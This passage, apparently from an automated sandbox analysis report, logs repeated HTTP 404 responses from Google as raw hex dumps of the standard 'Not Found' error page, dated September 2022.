74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 